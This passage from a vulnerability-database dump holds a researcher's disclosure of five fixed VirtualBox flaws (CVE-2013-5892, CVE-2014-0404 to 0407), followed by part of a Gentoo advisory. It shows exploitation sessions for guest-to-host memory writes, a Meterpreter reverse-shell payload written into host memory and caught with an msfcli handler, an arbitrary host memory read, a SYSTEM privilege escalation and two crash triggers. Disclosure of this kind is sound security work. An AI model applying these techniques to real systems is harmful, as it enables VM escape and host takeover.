can be exploited to allow host ring 3 code execution from guest ring 
0\r\n(assuming a guest IOPL of 0). A POC exploit in the form of a Linux kernel\r\nmodule which takes "addr" and "val" arguments to specify where and what to\r\nwrite into host ring 3 memory was created (and sent in the full report):\r\nmattd@debian:~$ /sbin/modinfo vmmdev_vuln_oflow.ko\r\nfilename: /home/mattd/vmmdev_vuln_oflow.ko\r\nlicense: Dual BSD/GPL\r\ndepends:\r\nvermagic: 3.2.0-4-486 mod_unload modversions 486\r\nparm: addr:Host-ring3 address to write to (ulong)\r\nparm: val:Value to write (UTF-8 hex) (string)\r\n\r\nHere is an example exploitation session:\r\n\r\n- Start a VM\r\n$ VBoxManage startvm foo4 --type headless\r\nWaiting for VM "foo4" to power on...\r\nVM "foo4" has been successfully started.\r\n\r\n- Demonstrate that there is nothing written at this arbitrarily-chosen location in the host-side VBox process memory\r\n$ sudo dd if=/proc/`pidof VBoxHeadless`/mem bs=1 skip=$((0x804eff0)) count=16 2> /dev/null | hd\r\n00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n00000010\r\n\r\n- Run the exploit in the guest VM, specifying what to write and where\r\n$ ssh -p2222 root@foo4 'insmod vmmdev_vuln_oflow.ko addr=0x804eff0 val=`echo -n "Hi from guest!" 
| hexdump -e "/1 "\""%x"\"`'\r\n\r\n- Demonstrate that the string was successfully written to the aforementioned host-side location\r\n$ sudo dd if=/proc/`pidof VBoxHeadless`/mem bs=1 skip=$((0x804eff0)) count=16 2> /dev/null | hd\r\n00000000 48 69 20 66 72 6f 6d 20 67 75 65 73 74 21 00 00 |Hi from guest!..|\r\n00000010\r\n\r\n- Run the exploit in the guest VM again, this time to generate a SIGSEGV in the process\r\n$ ssh -p2222 root@foo4 'rmmod vmmdev_vuln_oflow.ko; insmod ~mattd/vmmdev_vuln_oflow.ko addr=0xdeadbeef val=4142434445'\r\nConnection to foo4 closed by remote host.\r\n\r\n- Demonstrate that the host-side VBox process did indeed die\r\n$ dmesg | tail -n1\r\n[24916.950477] GuestPropSvc[12681]: segfault at deadbeef ip b758b55f sp b49091bc error 7 in libc-2.17.so[b750c000+1a9000]\r\n\r\n- Check out the generated core dump\r\n$ gdb /usr/lib/virtualbox/VBoxHeadless core\r\nGNU gdb (GDB) 7.6 (Debian 7.6-5)\r\nCopyright (C) 2013 Free Software Foundation, Inc.\r\n(...)\r\nCore was generated by `/usr/lib/virtualbox/VBoxHeadless --comment foo4 --startvm d8eac50d-f6d7-4b04-bf'.\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 __memcpy_ia32 () at ../sysdeps/i386/i686/multiarch/../memcpy.S:98\r\n98 ../sysdeps/i386/i686/multiarch/../memcpy.S: No such file or directory.\r\n(gdb) bt\r\n#0 __memcpy_ia32 () at ../sysdeps/i386/i686/multiarch/../memcpy.S:98\r\n#1 0xb5f0c1c4 in guestProp::Service::getProperty (this=this@entry=0xb5101048, cParms=cParms@entry=4, paParms=paParms@entry=0xaa2635dc)\r\n at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/HostServices/GuestProperties/service.cpp:609\r\n#2 0xb5f0e7ce in guestProp::Service::call (this=0xb5101048, callHandle=0xaa263a60, u32ClientID=7, eFunction=1, cParms=4, paParms=0xaa2635dc)\r\n at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/HostServices/GuestProperties/service.cpp:1260\r\n#3 0xb6154e8e in hgcmServiceThread (ThreadHandle=2147483665, pvUser=0x8cb89c0)\r\n at 
/build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Main/src-client/HGCM.cpp:603\r\n#4 0xb6153783 in hgcmWorkerThreadFunc (ThreadSelf=0x8cb8bc0, pvUser=0x8cb8a38)\r\n at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Main/src-client/HGCMThread.cpp:194\r\n#5 0xb743a1fe in rtThreadMain (pThread=0x8cb8bc0, NativeThread=3029375808, pszThreadName=0x8cb914c "GuestPropSvc")\r\n at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Runtime/common/misc/thread.cpp:712\r\n#6 0xb748a429 in rtThreadNativeMain (pvArgs=0x8cb8bc0) at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Runtime/r3/posix/thread-posix.cpp:321\r\n#7 0xb76c7cf1 in start_thread (arg=0xb4909b40) at pthread_create.c:311\r\n#8 0xb75fafee in clone () at ../sysdeps/unix/sysv/linux/i386/clone.S:131\r\n(gdb) x/2i $pc\r\n=> 0xb758b55f <__memcpy_ia32+95>: movsw %ds:(%esi),%es:(%edi)\r\n 0xb758b561 <__memcpy_ia32+97>: rep movsl %ds:(%esi),%es:(%edi)\r\n(gdb) i r esi edi eax\r\nesi 0xb5102a74 -1257231756\r\nedi 0xdeadbeef -559038737\r\neax 0x6 6\r\n(gdb) x/6c $esi\r\n0xb5102a74: 65 'A' 66 'B' 67 'C' 68 'D' 69 'E' 0 '\000'\r\n(gdb) fr 1\r\n#1 0xb5f0c1c4 in guestProp::Service::getProperty (this=this@entry=0xb5101048, cParms=cParms@entry=4, paParms=paParms@entry=0xaa2635dc)\r\n at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/HostServices/GuestProperties/service.cpp:609\r\n609 memcpy(pchBuf, pProp->mValue.c_str(), cbValue);\r\n(gdb) p pchBuf\r\n$1 = 0xdeadbeef <Address 0xdeadbeef out of bounds>\r\n(gdb) p pProp->mValue\r\n$2 = {static npos = <optimized out>, _M_dataplus = {<std::allocator<char>> = {<__gnu_cxx::new_allocator<char>> = {<No data fields>}, <No data fields>},\r\n _M_p = 0xb5102a74 "ABCDE"}}\r\n\r\nOne can use a separate utility script that provides a series of (addr, val)\r\npairs to insert the module with repeatedly so as to write (almost) any\r\narbitrary binary data. 
It does this by suggesting to write a series of\r\nindividually UTF-8 valid strings at monotonically increasing addresses. This\r\nwas tested with a Meterpreter payload to get a shell on the host:\r\n\r\n(on the VM:)\r\n\r\n- Show the Meterpreter almost-pure-ASCII payload\r\nfoo4$ hd reverse-tcp-payload | head\r\n00000000 54 59 da c4 d9 71 f4 5f 57 59 49 49 49 49 49 49 |TY...q._WYIIIIII|\r\n00000010 49 49 49 49 43 43 43 43 43 43 37 51 5a 6a 41 58 |IIIICCCCCC7QZjAX|\r\n00000020 50 30 41 30 41 6b 41 41 51 32 41 42 32 42 42 30 |P0A0AkAAQ2AB2BB0|\r\n00000030 42 42 41 42 58 50 38 41 42 75 4a 49 50 31 49 4b |BBABXP8ABuJIP1IK|\r\n00000040 6c 37 6a 43 52 73 52 63 70 53 53 5a 47 72 6e 50 |l7jCRsRcpSSZGrnP|\r\n00000050 50 66 4d 59 78 61 48 4d 6b 30 6c 57 31 4b 51 78 |PfMYxaHMk0lW1KQx|\r\n00000060 49 50 6e 48 46 61 46 30 52 48 66 62 73 30 77 61 |IPnHFaF0RHfbs0wa|\r\n00000070 51 4c 4d 59 78 61 31 7a 73 56 63 68 56 30 63 61 |QLMYxa1zsVchV0ca|\r\n00000080 36 37 4e 69 4b 51 63 73 48 4d 4d 50 4f 42 56 67 |67NiKQcsHMMPOBVg|\r\n00000090 6f 49 55 50 74 50 77 70 53 30 6d 59 7a 43 6f 31 |oIUPtPwpS0mYzCo1|\r\n\r\n- Show the output of the aforementioned string -> (addr, val) script on the payload\r\nfoo4$ ./bin2args.py $((0x8050830)) < reverse-tcp-payload | head -n5\r\naddr=0x8050830 val=5459\r\naddr=0x8050832 val=dabf\r\naddr=0x8050833 val=c4bf\r\naddr=0x8050834 val=d9bf\r\naddr=0x8050835 val=71\r\n\r\n- Use the script to write the payload into host-side VBox process memory\r\nfoo4$ ./bin2args.py $((0x8050830)) < reverse-tcp-payload | sudo xargs -n2 -I{} sh -c 'rmmod vmmdev_vuln_oflow; insmod vmmdev_vuln_oflow.ko {}'\r\nError: Module vmmdev_vuln_oflow is not currently loaded\r\n\r\n- Write the payload's address to a function pointer in the process\r\nfoo4$ sudo rmmod vmmdev_vuln_oflow; sudo insmod vmmdev_vuln_oflow.ko addr=0x0804e6f0 val=30080508\r\n\r\n- Trigger the payload\r\nfoo4$ sudo halt\r\n\r\nBroadcast message from root@debian (pts/0) (Tue Oct 22 01:20:40 2013):\r\n\r\nThe 
system is going down for system halt NOW!\r\n\r\n(on the attacker's end:)\r\n\r\n- Start a Meterpreter session and wait for connection\r\n$ msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.80 E\r\n[*] Please wait while we load the module tree...\r\n(...)\r\n =[ metasploit v4.7.0-1 [core:4.7 api:1.0]\r\n+ -- --=[ 1141 exploits - 720 auxiliary - 194 post\r\n+ -- --=[ 309 payloads - 30 encoders - 8 nops\r\n\r\nPAYLOAD => linux/x86/meterpreter/reverse_tcp\r\nLHOST => 192.168.1.80\r\n[*] Started reverse handler on 192.168.1.80:4444\r\n[*] Starting the payload handler...\r\n[*] Transmitting intermediate stager for over-sized stage...(100 bytes)\r\n[*] Sending stage (1126400 bytes) to 192.168.1.80\r\n[*] Meterpreter session 1 opened (192.168.1.80:4444 -> 192.168.1.80:49648) at 2013-10-22 01:20:53 +1300\r\n\r\nmeterpreter > shell\r\nProcess 16070 created.\r\nChannel 1 created.\r\n/bin/sh: 0: can't access tty; job control turned off\r\n$ ps f --sid `ps -o sid $$ | tail -n+2`\r\n PID TTY STAT TIME COMMAND\r\n15959 ? Sl 1:37 /usr/lib/virtualbox/VBoxHeadless --comment foo4 --sta\r\n16070 ? S 0:00 \_ /bin/sh\r\n16082 ? R 0:00 \_ ps f --sid 15935\r\n\r\nSpecifically, the POC uses the Shared Properties service to get\r\nattacker-controlled data to be written out as an HGCM result. It also uses\r\nthis service specifically because it can handle the necessary four arguments\r\nfor the exploit to function (name + skip + overflow + skip). Null page lists\r\nare used to skip address space, allowing one to write the attacker-chosen\r\nmemory location to the second HGCM output argument (property value output)\r\nhost buffer pointer.\r\n\r\nOn 32-bit hosts, this works fine. On 64-bit ones, because the HGCM size is\r\ncalculated using a 32-bit variable ("cbCmdSize"), one cannot wrap the 64-bit\r\naddress space entirely, however one can still overflow up to 4GB after the\r\nVBOXHGCMCMD structure for a traditional heap-based attack.\r\n\r\n\r\n* Vuln. 
#2: VMMDev HGCM argument type confusion (CVE-2014-0407)\r\n\r\nProcessing a HGCM call is a three-step process: reading the arguments from the\r\nguest, invoking the HGCM connector to make the call, and writing the result\r\nback out to the guest. Between these steps, when using the default HGCM\r\nconnector, the guest may run for a limited amount of time (the result code\r\nreturned at step 2 is VINF_HGCM_ASYNC_EXECUTE). This issue lies in the fact\r\nthat the argument types are re-read from guest-controlled memory at step 3,\r\nwhen the result is being written out. By racing to change the type of an\r\nargument between steps 1 and 3, incorrect processing can occur. This includes\r\nthings such as treating what was initially a guest-provided integer argument\r\nas the location of an argument buffer to read a result from, if the new type\r\nwould normally have one.\r\n\r\nThis can be exploited to read cleanly from anywhere in host ring 3 address\r\nspace - an ASLR-proof information leak of arbitrary length, complementing the\r\nfirst vulnerability.\r\n\r\nThis leads to a host ring 3 information leak to guest ring 0.\r\n\r\nA POC exploit in the form of a Linux kernel module which takes an "addr"\r\nargument to specify where to read from host ring 3 memory, outputting the\r\nresult to the kernel ring buffer (ie. 
viewable with `dmesg`) was created (and\r\nsent in the full report):\r\nmattd@debian:~$ /sbin/modinfo vmmdev_vuln_typeconf.ko\r\nfilename: /home/mattd/vmmdev_vuln_typeconf.ko\r\nlicense: Dual BSD/GPL\r\ndepends:\r\nvermagic: 3.2.0-4-486 mod_unload modversions 486\r\nparm: addr:Host-ring3 address to read from (ulong)\r\n\r\nHere is an example exploitation session:\r\n\r\n- Observe the address space of the host-side VBox process to find where the ELF itself was loaded\r\n$ sudo head /proc/`pidof VBoxHeadless`/maps\r\n08048000-0804e000 r-xp 00000000 68:01 4083239 /usr/lib/virtualbox/VBoxHeadless\r\n0804e000-0804f000 rw-p 00005000 68:01 4083239 /usr/lib/virtualbox/VBoxHeadless\r\n0804f000-08051000 rw-p 00000000 00:00 0\r\n08255000-082df000 rw-p 00000000 00:00 0 [heap]\r\na8d00000-a8f00000 rw-s 00000000 00:04 989 /dev/zero (deleted)\r\na8f00000-a9100000 rw-s 00000000 00:04 988 /dev/zero (deleted)\r\na9100000-a9300000 rw-s 00000000 00:04 7084 /dev/zero (deleted)\r\na9300000-a9500000 rw-s 00000000 00:04 981 /dev/zero (deleted)\r\na9500000-a9700000 rw-s 00000000 00:04 980 /dev/zero (deleted)\r\na9700000-a9900000 rw-s 00000000 00:04 7081 /dev/zero (deleted)\r\n\r\n- Check out the contents at the aforementioned load address\r\n$ sudo dd if=/proc/`pidof VBoxHeadless`/mem bs=1 skip=$((0x08048000)) count=256 2> /dev/null | hd\r\n00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|\r\n00000010 02 00 03 00 01 00 00 00 b4 8c 04 08 34 00 00 00 |............4...|\r\n00000020 c8 59 00 00 00 00 00 00 34 00 20 00 08 00 28 00 |.Y......4. 
...(.|\r\n00000030 1c 00 1b 00 06 00 00 00 34 00 00 00 34 80 04 08 |........4...4...|\r\n00000040 34 80 04 08 00 01 00 00 00 01 00 00 05 00 00 00 |4...............|\r\n00000050 04 00 00 00 03 00 00 00 34 01 00 00 34 81 04 08 |........4...4...|\r\n00000060 34 81 04 08 13 00 00 00 13 00 00 00 04 00 00 00 |4...............|\r\n00000070 01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 |................|\r\n00000080 00 80 04 08 ec 56 00 00 ec 56 00 00 05 00 00 00 |.....V...V......|\r\n00000090 00 10 00 00 01 00 00 00 ec 56 00 00 ec e6 04 08 |.........V......|\r\n000000a0 ec e6 04 08 cc 01 00 00 6c 24 00 00 06 00 00 00 |........l$......|\r\n000000b0 00 10 00 00 02 00 00 00 f8 56 00 00 f8 e6 04 08 |.........V......|\r\n000000c0 f8 e6 04 08 f8 00 00 00 f8 00 00 00 06 00 00 00 |................|\r\n000000d0 04 00 00 00 04 00 00 00 48 01 00 00 48 81 04 08 |........H...H...|\r\n000000e0 48 81 04 08 44 00 00 00 44 00 00 00 04 00 00 00 |H...D...D.......|\r\n000000f0 04 00 00 00 50 e5 74 64 8c 4d 00 00 8c cd 04 08 |....P.td.M......|\r\n00000100\r\n\r\n- Run the exploit on the guest VM, specifying the host-side address to read from\r\n$ ssh -p2222 root@foo4 insmod vmmdev_vuln_typeconf.ko addr=$((0x08048000))\r\n\r\n- Observe the output in the guest VM's dmesg and see that it is as expected\r\n$ ssh -p2222 foo4 'dmesg | grep -A15 "vmmdev_vuln_typeconf: 00000000"'\r\n[ 477.168335] vmmdev_vuln_typeconf: 00000000: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 .ELF............\r\n[ 477.168393] vmmdev_vuln_typeconf: 00000010: 02 00 03 00 01 00 00 00 b4 8c 04 08 34 00 00 00 ............4...\r\n[ 477.168443] vmmdev_vuln_typeconf: 00000020: c8 59 00 00 00 00 00 00 34 00 20 00 08 00 28 00 .Y......4. 
...(.\r\n[ 477.168470] vmmdev_vuln_typeconf: 00000030: 1c 00 1b 00 06 00 00 00 34 00 00 00 34 80 04 08 ........4...4...\r\n[ 477.168497] vmmdev_vuln_typeconf: 00000040: 34 80 04 08 00 01 00 00 00 01 00 00 05 00 00 00 4...............\r\n[ 477.168525] vmmdev_vuln_typeconf: 00000050: 04 00 00 00 03 00 00 00 34 01 00 00 34 81 04 08 ........4...4...\r\n[ 477.168552] vmmdev_vuln_typeconf: 00000060: 34 81 04 08 13 00 00 00 13 00 00 00 04 00 00 00 4...............\r\n[ 477.168579] vmmdev_vuln_typeconf: 00000070: 01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 ................\r\n[ 477.168606] vmmdev_vuln_typeconf: 00000080: 00 80 04 08 ec 56 00 00 ec 56 00 00 05 00 00 00 .....V...V......\r\n[ 477.168633] vmmdev_vuln_typeconf: 00000090: 00 10 00 00 01 00 00 00 ec 56 00 00 ec e6 04 08 .........V......\r\n[ 477.168675] vmmdev_vuln_typeconf: 000000a0: ec e6 04 08 cc 01 00 00 6c 24 00 00 06 00 00 00 ........l$......\r\n[ 477.168702] vmmdev_vuln_typeconf: 000000b0: 00 10 00 00 02 00 00 00 f8 56 00 00 f8 e6 04 08 .........V......\r\n[ 477.168729] vmmdev_vuln_typeconf: 000000c0: f8 e6 04 08 f8 00 00 00 f8 00 00 00 06 00 00 00 ................\r\n[ 477.168756] vmmdev_vuln_typeconf: 000000d0: 04 00 00 00 04 00 00 00 48 01 00 00 48 81 04 08 ........H...H...\r\n[ 477.168784] vmmdev_vuln_typeconf: 000000e0: 48 81 04 08 44 00 00 00 44 00 00 00 04 00 00 00 H...D...D.......\r\n[ 477.168811] vmmdev_vuln_typeconf: 000000f0: 04 00 00 00 50 e5 74 64 8c 4d 00 00 8c cd 04 08 ....P.td.M......\r\n\r\nThis works fine on a 32-bit host. On 64-bit hosts, one cannot use the\r\n'int-as-address' technique because of differing resizing + alignment issues in\r\nVBOXHGCMSVCPARM's union used to hold the argument information host-side (at\r\nleast on GCC); other methods might be possible instead.\r\n\r\n\r\n* Vuln. 
#3: Windows Shared Folder Redirector IOCTL_MRX_VBOX_DELCONN\r\n missing validation (CVE-2014-0405)\r\n\r\nWhen handling an IOCTL_MRX_VBOX_DELCONN request, the Windows Shared Folder\r\nRedirector attempts to retrieve the associated RDBSS file object extension\r\n(FOBX) from the user-provided file's FsContext2 field. It does not check,\r\nhowever, that one actually exists (is non-null), and hence the driver can be\r\nled to execute upon a user-provided FOBX by placing a crafted one in the null\r\nmemory page. This execution involves calling a FOBX-provided callback, which\r\ncan point to a user-provided routine.\r\n\r\nThis IOCTL is defined as FILE_ANY_ACCESS and so can be called by any Windows\r\nuser, regardless of access rights.\r\n\r\nThis leads to a guest ring 3 to guest ring 0 privilege escalation (and nicely\r\ncomplements the guest ring 0 to host ring 3 vulnerability,\r\n#1 / CVE-2013-5892!)\r\n\r\nA POC exploit in the form of a Windows application that executes a given\r\ncommand line (or cmd.exe as a default) as the SYSTEM user regardless of what\r\nuser it is run as initially was created (and sent in the full report):\r\n\r\nHere is a sample exploitation session (in the guest VM):\r\n\r\n- Check the current user's username and assigned groups\r\nE:\>whoami /user /groups\r\n[User] = "LOLTECH-GPG0BTT\limited"\r\n\r\n[Group 1] = "LOLTECH-GPG0BTT\None"\r\n[Group 2] = "Everyone"\r\n[Group 3] = "BUILTIN\Users"\r\n[Group 4] = "LOCAL"\r\n[Group 5] = "NT AUTHORITY\INTERACTIVE"\r\n[Group 6] = "NT AUTHORITY\Authenticated Users"\r\n\r\n- Demonstrate the access level by showing that we cannot create a file in a restricted directory\r\nE:\>echo > c:\windows\test.txt\r\nAccess is denied.\r\n\r\n- Run the exploit\r\nE:\>vboxrdr_vuln_devcontrol.exe\r\n\r\n(... 
a new command prompt opens ...)\r\n\r\n- Check the new current user's username and assigned groups\r\nC:\WINDOWS>whoami /user /groups\r\n[User] = "NT AUTHORITY\SYSTEM"\r\n\r\n[Group 1] = "BUILTIN\Administrators"\r\n[Group 2] = "Everyone"\r\n[Group 3] = "NT AUTHORITY\Authenticated Users"\r\n\r\n- Demonstrate the new access level by showing that we can now create the aforementioned file\r\nC:\WINDOWS>echo > c:\windows\test.txt\r\n\r\nC:\WINDOWS>\r\n\r\nOn 32-bit guests this works fine, and on 64-bit ones it should also work, with\r\nthe necessary changes to the crafted FOBX structure.\r\n\r\n\r\nThe last two vulnerabilities are a bit more boring.\r\n\r\n\r\n* Vuln. #4: VMMDev SetPointerShape missing validation (CVE-2014-0406)\r\n\r\nThe VMMDevReq_SetPointerShape request handler does not validate the given\r\nwidth and height against the actual amount of request data given (ie.\r\npointerData), and hence can be made to read off the end of the request.\r\n\r\nThis leads to a guest-triggerable DOS of the host-side VBox process.\r\n\r\nA POC exploit in the form of a Linux kernel module was created (and sent in\r\nthe full report).\r\n\r\nHere is a sample session:\r\n\r\n- Run the exploit in the guest VM\r\n$ ssh -p2222 root@foo4 insmod vmmdev_vuln_shape.ko\r\nConnection to foo4 closed by remote host.\r\n\r\n- Check out the generated core dump\r\n$ gdb /usr/lib/virtualbox/VBoxHeadless core\r\nGNU gdb (GDB) 7.6 (Debian 7.6-5)\r\nCopyright (C) 2013 Free Software Foundation, Inc.\r\n(...)\r\nCore was generated by `/usr/lib/virtualbox/VBoxHeadless --startvm foo4'.\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 __memcpy_ia32 () at ../sysdeps/i386/i686/multiarch/../memcpy.S:74\r\n74 ../sysdeps/i386/i686/multiarch/../memcpy.S: No such file or directory.\r\n(gdb) bt\r\n#0 __memcpy_ia32 () at ../sysdeps/i386/i686/multiarch/../memcpy.S:74\r\n#1 0xa8910008 in ?? 
()\r\n#2 0xb329969b in vmmdevRequestHandler (pDevIns=pDevIns@entry=0xb46d8dc0, pvUser=pvUser@entry=0xb46d8e80, Port=Port@entry=53280, u32=u32@entry=102366948,\r\n cb=cb@entry=4) at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Devices/VMMDev/VMMDev.cpp:1178\r\n[..omitted..]\r\n(gdb) fr 2\r\n#2 0xb329969b in vmmdevRequestHandler (pDevIns=pDevIns@entry=0xb46d8dc0, pvUser=pvUser@entry=0xb46d8e80, Port=Port@entry=53280, u32=u32@entry=102366948,\r\n cb=cb@entry=4) at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Devices/VMMDev/VMMDev.cpp:1178\r\n1178 pointerShape->pointerData);\r\n(gdb) l\r\n1173 pThis->pDrv->pfnUpdatePointerShape(pThis->pDrv,\r\n1174 fVisible,\r\n1175 fAlpha,\r\n1176 pointerShape->xHot, pointerShape->yHot,\r\n1177 pointerShape->width, pointerShape->height,\r\n1178 pointerShape->pointerData);\r\n1179 }\r\n1180 else\r\n1181 {\r\n1182 pThis->pDrv->pfnUpdatePointerShape(pThis->pDrv,\r\n\r\nThis works fine regardless of host architecture width (32/64-bit).\r\n\r\n\r\n* Vuln. #5: Bad assert in vmmdevHGCMSaveLinPtr (CVE-2014-0404)\r\n\r\nThe AssertRelease at the end of vmmdevHGCMSaveLinPtr checks whether the amount\r\nof pages successfully saved is equal to the entire amount given. 
This assert\r\ncan be guest-triggered by simply invoking a HGCM call with an invalid linear\r\npointer argument.\r\n\r\nThis leads to a guest-triggerable DOS of the host-side VBox process.\r\n\r\nA POC exploit in the form of a Linux kernel module was created (and sent in\r\nthe full report).\r\n\r\nHere is a sample session:\r\n\r\n- Run the exploit in the guest VM\r\n$ ssh -p2222 root@foo4 insmod vmmdev_vuln_linaddrout.ko\r\nConnection to foo4 closed by remote host.\r\n\r\n- Check the end of the log output from the now-dead host-side VBox process\r\n$ tail VirtualBox\ VMs/foo4/Logs/VBox.log\r\n00:01:04.537820 NAT: DNS#0: 192.168.1.8\r\n00:01:04.537877 NAT: DHCP offered IP address 10.0.2.15\r\n00:01:04.539477 PATM: Disabling IDT 3a patch handler c1288334\r\n00:01:16.994365 PATM: Disabling IDT 39 patch handler c1288330\r\n00:01:48.235937 NAT: old socket rcv size: 128KB\r\n00:01:48.235994 NAT: old socket snd size: 128KB\r\n00:01:48.541291\r\n00:01:48.541294 !!Assertion Failed!!\r\n00:01:48.541295 Expression: iPage == cPages\r\n00:01:48.541297 Location : /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Devices/VMMDev/VMMDevHGCM.cpp(297) int vmmdevHGCMSaveLinPtr(PPDMDEVINS, uint32_t, RTGCPTR, uint32_t, uint32_t, VBOXHGCMLINPTR*, RTGCPHYS**)\r\n\r\nThis works fine regardless of host architecture width (32/64-bit).\r\n\r\n\r\nFor more procedural details such as the versions of VirtualBox that are\r\naffected and those that are not, how to get updates and other information,\r\nplease see Oracle's CPU advisory itself (linked at the start of this mail.)\r\n\r\n\r\nCheers!\r\n\r\n- Matthew Daley\r\n", "edition": 1, "cvss3": {}, "published": "2014-02-10T00:00:00", "title": "Information on recently-fixed Oracle VM VirtualBox vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0405", "CVE-2014-0404", "CVE-2014-0406", "CVE-2014-0407", "CVE-2013-5892"], "modified": "2014-02-10T00:00:00", "id": 
"SECURITYVULNS:DOC:30292", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30292", "cvss": {"score": 3.5, "vector": "AV:LOCAL/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:46:15", "description": "Quarterly update fixes 144 different vulnerabilities.", "edition": 2, "cvss3": {}, "published": "2014-05-05T00:00:00", "title": "Oracle / Sun / MySQL / PeopleSoft / OpenJDK applications multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0371", "CVE-2012-3544", "CVE-2014-0400", "CVE-2013-5879", "CVE-2013-5876", "CVE-2013-5889", "CVE-2013-5909", "CVE-2014-0392", "CVE-2013-5873", "CVE-2013-5858", "CVE-2014-0405", "CVE-2013-5860", "CVE-2014-0367", "CVE-2014-0385", "CVE-2013-5878", "CVE-2014-0410", "CVE-2014-0398", "CVE-2013-5897", "CVE-2013-2071", "CVE-2014-0404", "CVE-2014-0415", "CVE-2014-0434", "CVE-2013-5884", "CVE-2014-0435", "CVE-2014-0443", "CVE-2013-5870", "CVE-2014-0390", "CVE-2013-5905", "CVE-2013-5880", "CVE-2013-5904", "CVE-2014-0391", "CVE-2013-5888", "CVE-2013-5893", "CVE-2014-0387", "CVE-2014-0393", "CVE-2014-0399", "CVE-2012-4605", "CVE-2013-5821", "CVE-2014-0431", "CVE-2013-5898", "CVE-2014-0427", "CVE-2014-0441", "CVE-2013-5900", "CVE-2013-1654", "CVE-2014-0433", "CVE-2014-0375", "CVE-2013-5886", "CVE-2014-0401", "CVE-2014-0396", "CVE-2014-0406", "CVE-2013-5872", "CVE-2014-0440", "CVE-2014-0425", "CVE-2013-5883", "CVE-2013-1862", "CVE-2013-5834", "CVE-2014-0418", "CVE-2014-0373", "CVE-2013-5877", "CVE-2013-5874", "CVE-2014-0439", "CVE-2014-0394", "CVE-2013-5887", "CVE-2014-0408", "CVE-2014-0376", "CVE-2014-0422", "CVE-2014-0419", "CVE-2014-0411", "CVE-2014-0369", "CVE-2014-0366", "CVE-2013-5882", "CVE-2013-5895", "CVE-2003-1067", "CVE-2014-0437", "CVE-2013-5885", "CVE-2013-5901", "CVE-2013-5881", "CVE-2013-2067", "CVE-2014-0389", "CVE-2014-0388", "CVE-2013-5899", "CVE-2014-0412", "CVE-2013-5896", "CVE-2013-3830", "CVE-2014-0417", 
"CVE-2014-0372", "CVE-2014-0407", "CVE-2013-5910", "CVE-2013-5906", "CVE-2014-0428", "CVE-2013-5891", "CVE-2014-0382", "CVE-2014-0370", "CVE-2013-5808", "CVE-2013-5871", "CVE-2014-0402", "CVE-2013-2924", "CVE-2014-0368", "CVE-2014-0420", "CVE-2013-5853", "CVE-2014-0423", "CVE-2013-5868", "CVE-2014-0430", "CVE-2014-0374", "CVE-2013-5875", "CVE-2013-5869", "CVE-2013-5907", "CVE-2014-0377", "CVE-2012-3499", "CVE-2013-5902", "CVE-2013-5894", "CVE-2013-5795", "CVE-2007-0009", "CVE-2013-5892", "CVE-2014-0381", "CVE-2014-0383", "CVE-2014-0424", "CVE-2014-0395", "CVE-2013-4316", "CVE-2014-0379", "CVE-2014-0403", "CVE-2013-5908", "CVE-2014-0386", "CVE-2007-1858", "CVE-2013-5785", "CVE-2014-0445", "CVE-2013-5764", "CVE-2014-0444", "CVE-2014-0378", "CVE-2013-5833", "CVE-2013-1620", "CVE-2013-5890", "CVE-2014-0416", "CVE-2014-0380", "CVE-2014-0438"], "modified": "2014-05-05T00:00:00", "id": "SECURITYVULNS:VULN:13537", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13537", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2022-01-17T19:09:30", "description": "### Background\n\nVirtualBox is a powerful virtualization product from Oracle.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Virtualbox. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA local attacker in a guest virtual machine may be able to escalate privileges or cause a Denial of Service condition. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll virtualbox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-emulation/virtualbox-4.2.22\"\n \n\nAll virtualbox-bin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=app-emulation/virtualbox-bin-4.2.22\"", "cvss3": {}, "published": "2014-01-20T00:00:00", "type": "gentoo", "title": "VirtualBox: Multiple Vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3221", "CVE-2013-5892", "CVE-2014-0404", "CVE-2014-0405", 